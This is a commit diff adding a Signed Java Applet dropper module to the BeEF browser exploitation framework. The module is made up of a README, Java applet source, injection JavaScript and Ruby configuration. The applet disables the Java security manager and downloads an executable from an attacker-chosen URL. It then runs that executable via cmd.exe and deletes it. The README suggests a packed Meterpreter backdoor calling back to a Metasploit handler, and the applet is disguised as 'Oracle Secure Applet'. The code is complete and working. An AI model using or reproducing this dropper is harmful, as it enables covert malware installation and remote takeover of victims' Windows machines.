From antisnatchor with love. New module: Signed Java Applet dropper (win only for now).

modules/exploits/local_host/signed_applet_dropper/README.txt

@@ -0,0 +1,22 @@
+--- How to use this module ---
+-- antisnatchor:
+ - the applet has been compiled with Java 1.6.0 update 0 in order to be compatible with every JRE > 1.6.x (1.7.x included)
+ - tested with IE8 on XP SP3, and IE10 on Win7
+ - tested with JRE 1.6.x and 1.7.x
+
+ - I advise you to recompile/re-sign the applet yourself, the following are the required steps to compile and self-sign the applet.
+NOTE: Best results are obtained signing the applet with a valid Code Signing certificate.
+
+ - Ideally the dropper is a packed backdoor (Meterpreter?) that connects back to your server (for instance a Metasploit multi/handler).
+
+1. compile the two classes
+javac SignedApplet.java SM.java
+
+2. create a JAR
+jar cvf SignedApplet.jar SignedApplet.class SM.class
+
+3. generate a keystore to self-sign the applet
+keytool -keystore tmp -genkey
+
+4. sign the applet
+jarsigner -keystore tmp signedAppletCmdExec.jar mykey

modules/exploits/local_host/signed_applet_dropper/applet/SM.java

@@ -0,0 +1,13 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ *
+ * author: antisnatchor
+*/
+import java.security.*;
+public class SM extends SecurityManager {
+    @Override
+    public void checkPermission(Permission perm) {
+        return;
+    }
+}

modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.java

@@ -0,0 +1,87 @@
+/*
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ *
+ * author: antisnatchor
+*/
+import java.applet.*;
+import java.awt.*;
+import java.io.*;
+import java.util.*;
+import java.net.URL;
+
+public class SignedApplet extends Applet {
+
+    public static String debug = "false";
+    public static String bin_url = "";
+    public static String bin_path = "";
+    public static boolean download = false;
+
+    public void init(){
+        bin_url = (String)getParameter("url");
+        String bin_rand_name = Long.toString(Math.abs((new Random()).nextLong()), 36);
+        bin_path = System.getProperty("java.io.tmpdir") + File.separator + bin_rand_name + ".exe";
+
+        // grab operating system -> not used atm
+        // TODO: make the applet compatible also with Linux/OSX
+        String os = System.getProperty("os.name").toLowerCase();
+        execute();
+    }
+
+    public SignedApplet(){
+        super();
+        SecurityManager sm = new SM();
+        System.setSecurityManager(sm);
+        return;
+    }
+
+    public static boolean download(){
+        boolean success = false;
+        try{
+            URL url = new URL(bin_url);
+            InputStream is = url.openStream();
+            BufferedInputStream isbuf = new BufferedInputStream(is);
+            File bin_out = new File(bin_path);
+            OutputStream out = new BufferedOutputStream(new FileOutputStream(bin_out));
+            byte[] buf = new byte[1024];
+            for (;;){
+                int bs = isbuf.read(buf);
+                if (bs <= 0) break;
+                out.write(buf, 0, bs);
+            }
+            out.flush();
+            out.close();
+            is.close();
+            success = true;
+            return success;
+        }catch(Exception e){
+            return success;
+        }
+    }
+
+    public static String execute() {
+        String result = "";
+        String command = "";
+        try{
+            boolean downloadOk = download();
+            System.out.println("Download [" + downloadOk + "] - bin_path [" + bin_path + "]");
+            result = "Download [" + downloadOk + "] - bin_path [" + bin_path + "]";
+
+            if(downloadOk){
+                // TODO: make the applet compatible also with Linux/OSX
+                command = "cmd.exe /c \"" + bin_path + "\"";
+                Process p = Runtime.getRuntime().exec(command);
+                p.waitFor();
+                /// delete dropped binary
+                new File(bin_path).delete();
+                result += "\n\nExecution OK.";
+            }else{
+                //downloading of dropper failed, catch error..
+                result = "Download error.";
+            }
+        }catch (Exception e) {
+            result = "Exception!!!: \n";
+        }
+        return result;
+    }
+}

modules/exploits/local_host/signed_applet_dropper/command.js

@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/applet/SignedApplet.jar';
+    var applet_name = '<%= @applet_name %>';
+    var dropper_url = '<%= @dropper_url %>';
+    var ie_only = '<%= @ie_only %>';
+
+    function attach(){
+       beef.dom.attachApplet('signed_applet', applet_name, 'SignedApplet.class',
+         null, applet_archive, [{'url':dropper_url}]);
+
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet added to the DOM.');
+    }
+
+    if(ie_only == "on"){
+       if(beef.browser.isIE()){
+         attach();
+       }
+    }else{
+       attach();
+    }
+});

modules/exploits/local_host/signed_applet_dropper/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        signed_applet_dropper:
+            enable: true
+            category: ["Exploits", "Local Host"]
+            name: "Signed Applet Dropper"
+            description: "Injects a Signed Java Applet (compiled with Java 1.6.0 in order to be compatible with every JRE from 1.6.0 to latest 1.7) that downloads a dropper and executes it.<br />Currently works only on Windows.<br /><br />Internet Explorer is the only browser that doesn't implement Click to Play for plugins, that's what the IE only checkbox is meant for."
+            authors: ["antisnatchor"]
+            target:
+                user_notify: ["All"]

modules/exploits/local_host/signed_applet_dropper/module.rb

@@ -0,0 +1,30 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Signed_applet_dropper < BeEF::Core::Command
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.jar', '/applet/SignedApplet', 'jar')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SM.class', '/applet/SM', 'class')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/signed_applet_dropper/applet/SignedApplet.class', '/applet/SignedApplet', 'class')
+
+  end
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    return [
+        {'name' => 'dropper_url', 'ui_label' => 'Dropper URL', 'value' => 'http://dropper_url/'},
+        {'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Oracle Secure Applet'},
+        {'name' => 'ie_only', 'ui_label' => 'Internet Explorer only?', 'type' => 'checkbox', 'checked' => 'checked' },
+
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end